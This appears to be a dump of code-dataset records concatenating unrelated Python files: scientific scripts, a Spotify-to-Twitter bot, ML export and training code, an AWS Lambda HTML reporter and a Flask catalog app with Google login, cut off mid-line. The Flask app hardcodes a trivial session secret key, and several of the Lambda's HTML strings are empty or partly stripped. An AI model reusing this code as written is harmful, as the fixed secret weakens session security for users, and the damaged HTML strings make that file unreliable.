sumNums(5)\nprint(result)\n\n\n","sub_path":"01.PythonDoc/04.变量-函数-返回值-参数/10.函数的参数.py","file_name":"10.函数的参数.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"24400842","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\n@author: Naoto Hori\n'''\nimport sys\nfrom cafysis.file_io.pdb import PdbFile\n\nif len(sys.argv) != 4:\n print ('\\n Usage: SCRIPT [bfactor file] [PDB file] [output bfactor file]\\n')\n sys.exit(2)\n\nf_bf_in = open(sys.argv[1], 'r')\nf_pdb = PdbFile(sys.argv[2])\nf_pdb.open_to_read()\nchains = f_pdb.read_all()\nf_pdb.close()\nf_bf_out = open(sys.argv[3], 'w')\n\nf_bf_out.write('## SCRIPT: bfactor_average_residue.py\\n')\nf_bf_out.write('## argv[1]: '+sys.argv[1]+'\\n')\nf_bf_out.write('## argv[2]: '+sys.argv[2]+'\\n')\nf_bf_out.write('## argv[3]: '+sys.argv[3]+'\\n')\nf_bf_out.write('\\n\\n')\n\nbf = []\nfor line in f_bf_in :\n if line.find('#') != -1 :\n continue\n bf.append(float(line.split()[1]))\n \n# current version is only for single chain\n#if len(chains) != 1:\n# print ('Error: len(chains) != 1')\n# sys.exit(2)\n \nimp = 0\nfor c in chains:\n sum_np = 0.0\n n_np = 0\n for r in c.residues:\n sum_p = sum_np\n sum_b = 0.0\n sum_s = 0.0\n sum_np = 0.0\n sum_pro = 0.0\n n_p = n_np\n n_b = 0\n n_s = 0\n n_np = 0\n n_pro = 0\n for a in r.atoms:\n if a.name[0:1] == 'H' or a.name[0:2] == ' H' :\n # print a.name, 'Hydrogen'\n pass\n elif a.name == ' CA ':\n sum_pro += bf[imp]\n n_pro += 1\n elif a.name == \" O3'\" :\n # print a.name, 'next P'\n sum_np += bf[imp] \n n_np += 1\n elif a.name.find(\"'\") != -1:\n # print a.name, 'S'\n sum_s += bf[imp]\n n_s += 1\n elif a.name in (\" P \", \" OP1\", \" OP2\", \"OP3\") :\n # print a.name, 'P'\n sum_p += bf[imp]\n n_p += 1\n else :\n # print imp,a.name, 'B'\n sum_b += bf[imp]\n n_b += 1\n imp += 1\n if n_pro == 0:\n if n_p != 0:\n f_bf_out.write('%f\\n' % (sum_p/float(n_p) ,))\n if n_s != 0:\n f_bf_out.write('%f\\n' % (sum_s/float(n_s) ,))\n if n_b != 0:\n f_bf_out.write('%f\\n' % (sum_b/float(n_b) ,))\n else:\n f_bf_out.write('%f\\n' % (sum_pro/float(n_pro), 
))\n","sub_path":"bfactor_average_residue.py","file_name":"bfactor_average_residue.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"73959045","text":"from pytz import timezone\nfrom datetime import datetime\n#from time import sleep\nfrom secret import *\nimport spotipy\nimport tweepy\n#import schedule\n\ndef isPlaying():\n if sp.currently_playing() != None:\n return True\n else:\n return False\n \ndef spotifySongInfo():\n # get info on current song, returns as a dictionary, access the information\n currentSongInformation = sp.currently_playing()\n songName = currentSongInformation['item']['name']\n if (currentSongInformation['item']['album']['album_type'] == 'single'):\n albumName = None\n else:\n albumName = currentSongInformation['item']['album']['name']\n songArtist = currentSongInformation['item']['artists'][0]['name']\n songLink = currentSongInformation['item']['external_urls']['spotify']\n return songName, albumName, songArtist, songLink\n \ndef deleteLatestTweet():\n latestTweet = api.user_timeline(count = 1)[0]\n message = f\"You're about to delete {latestTweet.text}. Would you like to continue? yes or no\\n\"\n if (input(message) == \"yes\"):\n return \"Successfully deleted the latest tweet: \" + \\\n api.destroy_status(latestTweet.id).text\n else:\n return \"No message has been deleted.\"\n \ndef tweetSpotifyStatus():\n # using pytz to use the Eastern timezone, necessary bc Heroku's local timezones differ\n eastern = timezone('US/Eastern')\n # returns the data for Eastern time currently\n currentEasternTime = datetime.now().astimezone(eastern)\n # returns hour in 12-hour format (%I) and the AM/PM (%p)\n hour = currentEasternTime.strftime(\"%I%p\").lstrip('0').lower()\n # returns weekday (%A) + month as # (%m) + day of month as # (%d)\n day = currentEasternTime.strftime(\"%A %m/%d\")\n \n if isPlaying() == True:\n try:\n song, album, artist, link = spotifySongInfo()\n if (album): # see if it has an album, if so, tweet the album as well\n print(f\"Posting the current status as of {hour} {day}: {song} of album {album} by {artist} on {hour} {day}.\\nSpotify Link: {link}\")\n api.update_status(f\"{username} is currently listening to {song} of the album {album} by {artist} as of {hour} {day}.{link}\")\n return\n api.update_status(f\"{username} is currently listening to {song} by {artist} as of {hour} {day}.{link}\")\n print(f\"Posting the current status as of {hour} {day}: {song} by {artist} on {hour} {day}.\\nSpotify Link: {link}\")\n except tweepy.TweepError as e:\n print(e)\n else:\n try:\n print(f\"Posting the current status as of {hour} {day}: False\")\n api.update_status(f\"{username} is NOT currently listening to Spotify as of {hour} {day}.\")\n except tweepy.TweepError as e:\n print(e) \n \n#schedule.every().hour.do(tweetSpotifyStatus)\n\nif __name__ == \"__main__\":\n sp = spotipy.Spotify(auth=spotifyToken())\n api = tweepy.API(twitterAuthentication())\n username = api.me().name\n print(\"Authenticated as \" + username)\n print(\"Tweeting the status of your Spotify account every hour.\")\n tweetSpotifyStatus()\n\n #while True:\n # schedule.run_pending()\n # sleep(1)","sub_path":"tweetSpotifySong.py","file_name":"tweetSpotifySong.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"607623410","text":"import io\nimport os\nimport numpy as np\nimport torch\nimport onnx\nimport 
onnxruntime\nfrom onnx import optimizer\nimport net.erfnet as net\nfrom options.options import parser\nfrom options.config import cfg\n\ndef load_model():\n global args\n args = parser.parse_args()\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = ','.join(str(gpu) for gpu in args.gpus)\n args.gpus = len(args.gpus)\n\n num_ego = cfg.NUM_EGO\n num_class = cfg.NUM_CLASSES\n model = net.ERFNet(num_class, num_ego).cuda()\n # model = torch.nn.DataParallel(model, device_ids=range(args.gpus)).cuda()\n\n if args.resume:\n if os.path.isfile(args.resume):\n print((\"=> loaded checkpoint '{}'\".format(args.resume)))\n checkpoint = torch.load(args.resume, map_location=lambda storage, loc: storage)\n print((\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, checkpoint['epoch'])))\n else:\n print((\"=> no checkpoint found at '{}'\".format(args.resume)))\n\n state_dict_ = checkpoint['state_dict']\n state_dict = {}\n\n # convert data_parallal to model\n for k in state_dict_:\n if k.startswith('module') and not k.startswith('module_list'):\n state_dict[k[7:]] = state_dict_[k]\n else:\n state_dict[k] = state_dict_[k]\n model_state_dict = model.state_dict()\n\n # check loaded parameters and created model parameters\n msg = 'If you see this, your model does not fully load the ' + \\\n 'pre-trained weight. Please make sure ' + \\\n 'you have correctly specified --arch xxx ' + \\\n 'or set the correct --num_classes for your own dataset.'\n for k in state_dict:\n if k in model_state_dict:\n if state_dict[k].shape != model_state_dict[k].shape:\n print('Skip loading parameter {}, required shape{}, '\n 'loaded shape{}. {}'.format(k, model_state_dict[k].shape,\n state_dict[k].shape, msg))\n state_dict[k] = model_state_dict[k]\n else:\n print('Drop parameter {}.'.format(k) + msg)\n for k in model_state_dict:\n if not (k in state_dict):\n print('No param {}.'.format(k) + msg)\n state_dict[k] = model_state_dict[k]\n model.load_state_dict(state_dict, strict=False)\n\n return model\n\ndef create_onnx_model(args):\n net = load_model()\n net.eval()\n\n onnx_file = args.onnx_file\n print(\"==> Exporting model to ONNX format at '{}'\".format(onnx_file))\n input_names = [\"input\"]\n if cfg.NUM_CLASSES and cfg.NUM_EGO:\n output_names = [\"output/cls\", \"output/ego\", \"output/exist\"]\n elif cfg.NUM_CLASSES and cfg.NUM_EGO == 0:\n output_names = [\"output/cls\"]\n elif cfg.NUM_CLASSES == 0 and cfg.NUM_EGO:\n output_names = [\"output/ego\", \"output/exist\"]\n torch_in = torch.randn(1, 3, cfg.MODEL_INPUT_HEIGHT, cfg.MODEL_INPUT_WIDTH, device='cuda')\n\n # from thop import profile\n # flops, params = profile(net, inputs=(torch_in,))\n # from thop import clever_format\n # macs, params = clever_format([flops, params], \"%.3f\")\n # print(macs, params, flops)\n\n with torch.no_grad():\n with io.BytesIO() as f:\n torch_out = net(torch_in)\n torch.onnx.export(net,\n torch_in,\n f,\n export_params=True,\n verbose=False,\n input_names=input_names,\n output_names=output_names)\n onnx_model = onnx.load_from_string(f.getvalue())\n\n all_passes = optimizer.get_available_passes()\n passes = args.onnx_optim_passes.split(',')\n assert all(p in all_passes for p in passes)\n onnx_model = optimizer.optimize(onnx_model, passes)\n\n onnx.save(onnx_model, onnx_file)\n\n # import netron\n # netron.start(onnx_file)\n\n return torch_in, torch_out\n\n\ndef validate_model(args, model_in, model_out):\n ort_session = onnxruntime.InferenceSession(args.onnx_file)\n\n def to_numpy(tensor):\n if isinstance(tensor, list):\n tensor = tensor[0]\n return 
tensor.detach().cpu().numpy(\n ) if tensor.requires_grad else tensor.cpu().numpy()\n\n # compute ONNX Runtime output prediction\n ort_inputs = {ort_session.get_inputs()[0].name: to_numpy(model_in)}\n ort_outs = ort_session.run(None, ort_inputs)\n\n # compare ONNX Runtime and PyTorch results\n\n for i in range(len(ort_outs)):\n print(ort_outs[i].shape)\n np.testing.assert_allclose(to_numpy(model_out),\n ort_outs[i],\n rtol=1e-03,\n atol=1e-05)\n\n print(\"Exported model has been tested with ONNXRuntime, \"\n \"and the result looks good!\")\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n inputs, outputs = create_onnx_model(args)\n print(\"Validating model... \")\n validate_model(args, inputs, outputs)\n print(\"All Done\")\n","sub_path":"src/convert_to_onnx.py","file_name":"convert_to_onnx.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"527521270","text":"#!/usr/bin/env python3\n\nfrom utils import Options\nfrom simulator import Simulator\nfrom transitionTable import TransitionTable\n\nimport numpy as np\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Conv1D, MaxPooling1D, Flatten, Dense, Dropout, Reshape\n\n#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# NOTE:\n# this script assumes you did generate your data with the get_data.py script\n# you are of course allowed to change it and generate data here but if you\n# want this to work out of the box first run get_data.py\n#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n# 0. initialization\nopt = Options()\nsim = Simulator(opt.map_ind, opt.cub_siz, opt.pob_siz, opt.act_num)\ntrans = TransitionTable(opt.state_siz, opt.act_num, opt.hist_len,\n opt.minibatch_size, opt.valid_size,\n opt.states_fil, opt.labels_fil)\n\ntrain_data = trans.get_train()\nvalid_data = trans.get_valid()\n\n# 1. train\n\nmodel = Sequential()\n\n# use data like provided as series\nmodel.add(Reshape((opt.state_siz * opt.hist_len, 1),\n input_shape=(opt.state_siz * opt.hist_len,)))\nmodel.add(Conv1D(8, kernel_size=64, strides=1, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=2))\nmodel.add(Conv1D(16, kernel_size=32, strides=1, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=2))\nmodel.add(Conv1D(32, kernel_size=16, strides=1, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=2))\nmodel.add(Conv1D(32, kernel_size=8, strides=1, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=2))\nmodel.add(Conv1D(32, kernel_size=4, strides=1, activation='relu'))\nmodel.add(MaxPooling1D(pool_size=2))\nmodel.add(Flatten())\nmodel.add(Dense(opt.act_num, activation='softmax'))\n\nmodel.summary()\n\nmodel.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adam(lr=0.001),\n metrics=['accuracy'])\n\ncallbacks = []\nif opt.log_tensorboard:\n tensorboard_cb = keras.callbacks.TensorBoard(log_dir=opt.tensorboard_log_dir, histogram_freq=1,\n write_graph=True, write_images=True, write_grads=True)\n callbacks.append(tensorboard_cb)\n\nmodel.fit(*train_data,\n batch_size=opt.minibatch_size,\n epochs=5,\n verbose=1,\n callbacks=callbacks,\n validation_data=valid_data)\n\n# 2. 
save your trained model\nmodel.save(opt.model_fil)\n","sub_path":"exercise3robotics/train_agent.py","file_name":"train_agent.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"628311862","text":"# coding=utf-8\nimport os.path\nfrom setuptools import setup, find_packages\n\n\ndef read_relative_file(filename):\n \"\"\"Returns contents of the given file.\n Filename argument must be relative to this module.\n \"\"\"\n with open(os.path.join(os.path.dirname(__file__), filename)) as f:\n return f.read()\n\n\nsetup(\n name='drupal.drush.generator',\n version='0.1dev',\n url='https://github.com/benoitbryon/drupal-drush-generator',\n author='Benoit Bryon',\n author_email='benoit@marmelune.net',\n license='BSD',\n description='Helpers to install drush and generate a \"project-specific\" ' \\\n 'drush script. Includes a buildout recipe.',\n long_description=read_relative_file('README.txt'),\n platforms='Any',\n classifiers = [\n 'Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n ],\n packages=find_packages(),\n namespace_packages=['drupal', 'drupal.drush'],\n include_package_data=True,\n data_files = [('drupal/drush/generator/templates/', ['drupal/drush/generator/templates/drush_wrapper.sh'])],\n install_requires=[\n 'setuptools',\n ],\n entry_points={\n 'zc.buildout': [\n 'drush_generator = drupal.drush.generator.buildout:DrushGeneratorRecipe',\n ],\n },\n scripts=[\n 'bin/drush_generator.py',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"218158916","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport wave\r\nimport struct\r\nfrom math import pi\r\nimport soundfile\r\n\r\nnum_samples = 4800\r\namplitude = 800\r\nsampling_rate = 4800.0\r\nFreq=[100,150,400,500,700,1000,1200,1500]\r\nfile = \"test3.wav\"\r\n\r\nt= np.arange(0,1,1/sampling_rate)\r\n\r\nsine_wave = 0\r\n\r\n#sine_wave = np.sin(2*pi*100*t)\r\n\r\nfor i in Freq:\r\n sine_wave += np.sin(2*pi*i*t)\r\n\r\nnframes=num_samples\r\ncomptype=\"NONE\"\r\ncompname=\"not compressed\"\r\nnchannels=1\r\nsampwidth=2\r\nwav_file=wave.open(file, 'w')\r\n\r\nwav_file.setparams((nchannels, sampwidth, int(sampling_rate), nframes, comptype, compname))\r\nfor s in sine_wave:\r\n wav_file.writeframes(struct.pack('h', int(s*amplitude)))\r\n","sub_path":"equallizer/wwave.py","file_name":"wwave.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"219411767","text":"from json import loads\nimport platform\nimport logging\nfrom urllib.request import urlopen\n\n''' Python 3 Lambda function that returns the following in raw HTML/CSS:\n\n - Location data based on the IP address of the function execution environment\n\n - Data passed from the browser client via API Gateway\n\n - Various attributes of the function execution context\n\n For info on provisioning API gateway, please see README.md @\n https://github.com/mikeoc61/aws-lambda-get-event-detail\n'''\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nplatform_data = {\n 'system': platform.system(),\n 'platform': platform.platform(),\n 'nodename': platform.node(),\n 'machine': platform.machine(),\n 'architecture': platform.architecture(),\n 'processor': 
platform.processor(),\n    'python': platform.python_version()\n    }\n\ndef get_IP_geo():\n    '''Get location related data from web service: http://ipinfo.io/json'''\n\n    geo_URL = \"http://ipinfo.io/json\"\n\n    # Initialize data structure we will use to build and return to caller so\n    # that function will still return data in an expected format if call fails\n\n    geo_json = {\n        \"ip\": \"123.123.123.123\",\n        \"city\": \"AnyTown\",\n        \"region\": \"AnyState\",\n        \"country\": \"AnyCountry\",\n        \"loc\": [\"99.9999\", \"-99.9999\"],\n        \"postal\": \"90210\",\n        \"org\": \"MickeyMouse Technologies Inc.\"\n    }\n\n    # Open the URL and read the data, if successful decode bytestring and\n    # split lat and long into separate strings for easier handling\n\n    try:\n        webUrl = urlopen(geo_URL)\n    except Exception:\n        logger.error(\"Error opening: %s, using default location\", geo_URL)\n    else:\n        if webUrl.getcode() == 200:\n            geo_data = webUrl.read()\n            geo_json = loads(geo_data.decode('utf-8'))\n            geo_json['loc'] = geo_json['loc'].split(',')\n        else:\n            logger.error(\"webUrl.getcode() returned: %s\", webUrl.getcode())\n            logger.error(\"Using default location data\")\n\n    return geo_json\n\ndef build_response(event, context):\n    '''Using event and context data structures provided by the event\n    handler, build a DOM formatted as CSS/HTML/Javascript consisting\n    of information about the execution environment and return DOM\n    to the lambda event handler.\n    '''\n\n    # Format the Head section of the DOM including any CSS formatting to\n    # apply to the remainder of the document. Break into multiple lines for\n    # improved readability\n\n    html_head = \"<html>\"\n    html_head += \"<head>\"\n    html_head += \"<title>Display Lambda Function Detail</title>\"\n    html_head += \"\"\n    html_head += \"</head>\"\n\n    # This is the main part of the routine and forms the HTML Body section and\n    # needs to be constructed of pure HTML as we will be returning only HTML to\n    # a browser client\n\n    html_body = \"<body>\"\n    html_body += \"<h1>AWS Lambda Function Event Details</h1>\"\n\n    html_body += \"\"\n    html_body += \"\"\n\n    html_body += \"\"\n\n    # Location detail based on IP address of calling function\n\n    my_geo = get_IP_geo()\n    html_body += \"<h2>Location Detail based on IP lookup</h2>\"\n    html_body += \"\"\n    html_body += \"<ul>\"\n    for k, v in my_geo.items():\n        html_body += \"<li>{} = {}</li>\".format(k, v)\n    html_body += \"</ul>\"\n    html_body += \"\"\n\n    # Platform Execution Environment details\n\n    html_body += \"<h2>Platform Execution Detail</h2>\"\n    html_body += \"\"\n    html_body += \"<ul>\"\n    for k, v in platform_data.items():\n        html_body += \"<li>{} = {}</li>\".format(k, v)\n    html_body += \"</ul>\"\n    html_body += \"\"\n\n    # Event detail based on format defined by API gateway Integration Request\n    # mapping template for method invoked. Loop through data structures in\n    # the event{} object and convert to HTML list items.\n\n    html_body += \"<h2>Client Request Detail</h2>\"\n\n    html_body += \"\"\n    html_body += \"<ul>\"\n    for key, v in event.items():\n        html_body += \"<h3>{}</h3>\".format(key)\n        logger.info(\"Key %s = %s\", key, event[key])\n        if isinstance(event[key], dict):\n            for attr, val in v.items():\n                html_body += \"<li>{} = {}</li>\".format(attr, v[attr])\n        elif isinstance(event[key], str):\n            html_body += \"<li>{} = {}</li>\".format(key, event[key])\n    html_body += \"</ul>\"\n    html_body += \"\"\n\n    # Display some context attributes for this lambda function. See:\n    # https://docs.aws.amazon.com/lambda/latest/dg/python-context-object.html\n\n    html_body += \"<h2>Event Context Detail</h2>\"\n    html_body += \"\"\n    html_body += \"<ul>\"\n    html_body += \"<li>Function name: {}</li>\".format(context.function_name)\n    html_body += \"<li>Function version: {}</li>\".format(context.function_version)\n    html_body += \"<li>Function ARN: {}</li>\".format(context.invoked_function_arn)\n    html_body += \"<li>Request ID: {}</li>\".format(context.aws_request_id)\n    html_body += \"\"\n    html_body += \"<li>Time used (MS): {}</li>\".format(\n        3000 - context.get_remaining_time_in_millis())\n    html_body += \"<li>Time budget remaining (MS): {}</li>\".format(\n        context.get_remaining_time_in_millis())\n    html_body += \"<li>Memory limits (MB): {}</li>\".format(\n        context.memory_limit_in_mb)\n    html_body += \"</ul>\"\n    html_body += \"\"\n\n    # Finished with HTML formatting\n\n    html_body += \"\"\n    html_body += \"</body>\"\n    html_tail = \"</html>\"\n\n    # Assemble HTML response and return via API Gateway\n\n    resp = html_head + html_body + html_tail\n\n    return resp\n\ndef lambda_handler(event, context):\n    '''Main event handler function invoked by API gateway. In this case, the\n    function simply calls build_response and returns CSS/HTML via the\n    gateway to the client\n    '''\n\n    logger.info('Event: %s', event)\n    logger.info('Context: %s', context)\n\n    return build_response(event, context)\n","sub_path":"get_event_detail.py","file_name":"get_event_detail.py","file_ext":"py","file_size_in_byte":7702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"598945420","text":"from flask import (Flask, jsonify, render_template, url_for, request,\n                   redirect, session as login_session, make_response, flash)\nfrom sqlalchemy import create_engine, exc\nfrom sqlalchemy.orm import sessionmaker\nfrom models import Base, Category, Item, User\nimport os\n\n# for login\nimport random\nimport string\nimport json\n\n# imports for google login\nfrom oauth2client.client import (OAuth2WebServerFlow, FlowExchangeError)\n\n# HTTP client library. get method returns None if object is not found\nimport httplib2\n# Apache 2.0 licensed HTTP library written in python\nimport requests\n\napp = Flask(__name__)\napp.secret_key = 'super_secret_key'\n\n\n# if in production(Heroku) then use their database url\n# else it is development, use the postgres engine\nif os.getenv('FLASK_ENV') == 'production':\n    debug = False\n    database_url = os.getenv('DATABASE_URL')\n    engine = create_engine(database_url)\nelse:\n    debug = True\n    engine = create_engine('postgresql+psycopg2:///item_catalog')\n\n# bind the engine\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\ndef logged_in():\n    \"\"\"check to see if user is logged in\"\"\"\n    return True if 'username' in login_session else False\n\n\n@app.route(\"/\")\n@app.route(\"/catalog/\")\ndef catalog():\n    \"\"\"lists all the categories\"\"\"\n    categories = session.query(Category).all()\n    return render_template('catalog.html', categories=categories,\n                           logged_in=logged_in())\n\n\n@app.route(\"/catalog/<int:category_id>/items/\")\ndef category_items(category_id):\n    \"\"\"show the category and its items\"\"\"\n    category = session.query(Category).filter_by(id=category_id).first()\n\n    # if the category does not exist, flash an error message\n    if category is None:\n        flash(\"There is no such category as %s!\" % category_id)\n        return redirect(url_for('catalog'))\n    items = session.query(Item).filter_by(cat_id=category.id)\n    return render_template('items.html', category=category, items=items,\n                           logged_in=logged_in())\n\n\n@app.route(\"/catalog/<int:category_id>/<int:item_id>/\")\ndef item(category_id, item_id):\n    \"\"\"specific item in the category\"\"\"\n    category = session.query(Category).filter_by(id=category_id).first()\n    item = session.query(Item).filter_by(id=item_id).first()\n    owner = getUserInfo(item.user_id)\n    # check to see if the edit and delete link should be shown to this user\n    show_update_links = False\n    if logged_in():\n        user_id = getUserID(login_session['email'])\n        if item.user_id == user_id:\n            show_update_links = True\n\n    # if there's no category or item, then flash error message\n    if category is None:\n        flash(\"Category '%s' does not exist!\" % category_id)\n        return redirect(url_for('catalog'))\n    elif item is None:\n        flash(\"Item '%s' does not exist!\" % item_id)\n        return redirect(url_for('catalog'))\n    elif 
item.category != category:\n        flash(\"%s does not have an item '%s'\" % (category_id, item_id))\n        return redirect(url_for('catalog'))\n    return render_template('item.html', category=category, item=item,\n                           owner=owner, show_update_links=show_update_links,\n                           logged_in=logged_in())\n\n\n@app.route(\"/catalog.json\")\ndef catalog_json():\n    \"\"\"json output of all the categories along with its items\"\"\"\n    categories = session.query(Category).all()\n    serialized_categories = []\n    for category in categories:\n\n        # get all the items in the category\n        items = session.query(Item).filter_by(category=category).all()\n        serialized_items = [item.serialize for item in items]\n\n        # serialize the current category and add its serialized items to it\n        current_category = category.serialize\n        current_category.update({\"items\": serialized_items})\n        serialized_categories.append(current_category)\n\n    # output the categories and its items\n    serialized_categories = {\"categories\": serialized_categories}\n    response = make_response(jsonify(serialized_categories))\n    response.headers['Content-type'] = 'application/json'\n    return response\n\n\n@app.route(\"/categories.json\")\ndef categories_json():\n    \"\"\"json output of all the categories without its items\"\"\"\n    categories = session.query(Category).all()\n    serialized_categories = [category.serialize for category in categories]\n    response = make_response(jsonify(serialized_categories))\n    response.headers['Content-type'] = 'application/json'\n    return response\n\n\n@app.route(\"/catalog/<int:category_id>/json/\")\ndef category_items_json(category_id):\n    \"\"\"json output of the category\"\"\"\n    category = session.query(Category).filter_by(id=category_id).first()\n    response = make_response(jsonify(category.serialize))\n    response.headers['Content-type'] = 'application/json'\n    return response\n\n\n@app.route(\"/catalog/<int:category_id>/<int:item_id>/json/\")\ndef item_json(category_id, item_id):\n    \"\"\"json output of specific item in the category\"\"\"\n    item = session.query(Item).filter_by(id=item_id).one_or_none()\n    response = make_response(jsonify(item.serialize))\n    response.headers['Content-type'] = 'application/json'\n    return response\n\n\n@app.route(\"/catalog/<int:item_id>/edit/\", methods=[\"GET\", \"POST\"])\ndef edit(item_id):\n    \"\"\"Edits the selected item\"\"\"\n    if logged_in():\n        item = session.query(Item).filter_by(id=item_id).first()\n        user_id = getUserID(login_session['email'])\n\n        # check if the item exists\n        if item is not None:\n            # if the logged in person is not the owner of the item,\n            # do not let them edit the item\n            if item.user_id != user_id:\n                flash('Unauthorized Access')\n                return redirect(url_for('catalog'))\n            # if it is a post method, update it in the database\n            if request.method == \"POST\":\n                title = request.form.get('title').strip()\n                description = request.form.get('description')\n                cat_id = request.form.get('cat_id')\n\n                # only update if they changed one of the fields. 
avoids db hits\n                if item and (item.description != description or\n                             str(item.cat_id) != cat_id or\n                             item.title != title):\n\n                    # only update the title if they\n                    # provided a title that is not empty\n                    if title:\n                        item.title = title\n                    item.description = description\n                    item.cat_id = cat_id\n                    session.add(item)\n                    session.commit()\n                    flash(\"You have updated %s\" % item.title)\n                    return redirect(url_for('item', category_id=item.cat_id,\n                                            item_id=item_id))\n                else:\n                    # if there was no change, flash error message\n                    flash(\"You didn't change anything!\")\n                    return redirect(url_for('edit', item_id=item_id))\n\n            # if get method, render the edit.html page\n            categories = session.query(Category).all()\n            return render_template('edit.html', item=item,\n                                   categories=categories,\n                                   logged_in=logged_in())\n        # if the item does not exist, let the user know\n        else:\n            flash(\"Item %s does not exist\" % item_id)\n            return redirect(url_for('catalog'))\n    else:\n        flash('Unauthorized Access')\n        return redirect(url_for('catalog'))\n\n\n@app.route(\"/catalog/<int:item_id>/delete/\", methods=[\"GET\", \"POST\"])\ndef delete(item_id):\n    \"\"\"Deletes the selected item\"\"\"\n    if logged_in():\n        item = session.query(Item).filter_by(id=item_id).first()\n        user_id = getUserID(login_session['email'])\n\n        # check if the item exists\n        if item is not None:\n            # if the logged in person is not the owner of the item,\n            # do not let them delete the item\n            if item.user_id != user_id:\n                flash('Unauthorized Access')\n                return redirect(url_for('catalog'))\n            # if it is a post method, delete it from the database\n            if request.method == \"POST\":\n                session.delete(item)\n                session.commit()\n                flash('Item was deleted')\n                return redirect(url_for('catalog'))\n            # if get method, show the button to confirm deletion\n            return render_template('delete.html', item=item,\n                                   logged_in=logged_in())\n        # if the item does not exist, let the user know\n        else:\n            flash(\"Item %s does not exist\" % item_id)\n            return redirect(url_for('catalog'))\n    else:\n        flash('Unauthorized Access')\n        return redirect(url_for('catalog'))\n\n\n@app.route(\"/catalog/new/\", methods=[\"GET\", \"POST\"])\ndef new():\n    \"\"\"Creates a new item\"\"\"\n\n    if logged_in() and request.method == 'POST':\n        # check to see if they entered a title\n        if request.form.get('title'):\n            # get the category and description and enter it into the database\n            title = request.form.get('title')\n            cat_id = request.form.get('category')\n            description = request.form.get('description')\n            user_id = getUserID(login_session['email'])\n            item = Item(cat_id=cat_id, title=title, description=description,\n                        user_id=user_id)\n            session.add(item)\n            session.commit()\n            # flash a message to let them know the item has been created\n            flash(\"You have added a new item! 
category id: %s , title: %s,\"\n \"description: %s\" % (cat_id, title, description))\n return redirect(url_for('catalog'))\n else:\n # show the 'new' form\n categories = session.query(Category).all() if logged_in() else None\n return render_template('new.html', categories=categories,\n logged_in=logged_in())\n\n\n@app.route('/login/')\ndef showLogin():\n \"\"\"Generates a state and shows a login page\"\"\"\n\n # create a random string state to prevent cross site forgery\n state = ''.join(random.choice(string.ascii_uppercase + string.digits)\n for x in range(32))\n # save state in session\n login_session['state'] = state\n CLIENT_ID = json.loads(open('client_secrets.json',\n 'r').read())['web']['client_id'] \n return render_template('login.html', STATE=state, CLIENT_ID=CLIENT_ID)\n\n\ndef getUserID(email):\n \"\"\"Get a user's id based on email\"\"\"\n try:\n user = session.query(User).filter_by(email=email).one_or_none()\n return user.id\n except exc.SQLAlchemyError:\n return None\n\n\ndef getUserInfo(user_id):\n \"\"\"get a user based on their id\"\"\"\n try:\n user = session.query(User).filter_by(id=user_id).first()\n return user\n except exc.SQLAlchemyError:\n return None\n\n\ndef createUser(login_session):\n \"\"\"creates a new user using the info stored in the\n login_session and saves it in the database\"\"\"\n newUser = User(email=login_session['email'])\n session.add(newUser)\n session.commit()\n user = session.query(User).filter_by(email=login_session['email']).one_or_none()\n return user.id\n\n\n@app.route('/gconnect', methods=[\"POST\"])\ndef gconnect():\n \"\"\"Connect using google login\"\"\"\n state = request.args.get('state')\n # if the state is not the same, then reject connection\n if state != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-type'] = 'application/json'\n return response\n\n # if the state tokens match, then get the google one time use code\n code = request.data\n try:\n # CLIENT_ID = os.environ.get('ITEM_CATALOG_GOOGLE_ID')\n # CLIENT_SECRET = os.environ.get('ITEM_CATALOG_GOOGLE_SECRET')\n CLIENT_ID = json.loads(open('client_secrets.json',\n 'r').read())['web']['client_id']\n CLIENT_SECRET = json.loads(open('client_secrets.json',\n 'r').read())['web']['client_secret']\n # upgrade the authorization code into a credentials object\n # oauth_flow = flow_from_clientsecrets('client_secrets.json',scope='')\n oauth_flow = OAuth2WebServerFlow(client_id=CLIENT_ID,\n client_secret=CLIENT_SECRET,\n scope='',\n redirect_uri='postmessage')\n credentials = oauth_flow.step2_exchange(code)\n # if unable to exchange authorization code for credentials, give error\n except FlowExchangeError:\n response = make_response(json.dumps('Failed to 